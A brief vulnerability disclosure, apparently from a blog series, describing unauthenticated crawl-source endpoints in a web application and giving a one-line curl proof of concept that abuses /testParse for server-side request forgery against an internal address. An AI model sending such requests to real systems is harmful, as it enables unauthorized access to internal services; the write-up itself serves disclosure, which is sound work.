Article 5: Vulnerability 4 – Unauthorized Crawler Source Control & SSRF
Article 5: Vulnerability 4 – Unauthorized Crawler Source Control & SSRF (CVE-3)
Title: Unauthenticated Crawl Interfaces Lead to Configuration Tampering and SSRF
Details:
-
POST /addCrawlSource: Adds a new crawl source without access control.
-
POST /testParse: Accepts arbitrary URLs and regex rules for remote parsing. Leads to SSRF and potential regex data leakage.
Example SSRF PoC:
curl -X POST "http://target-ip:port/testParse"
-d "rule=(<title>(.*?)</title>)&url=http://127.0.0.1:8080/internal&isRefresh=1"
CWE: CWE-306, CWE-918
浙公网安备 33010602011771号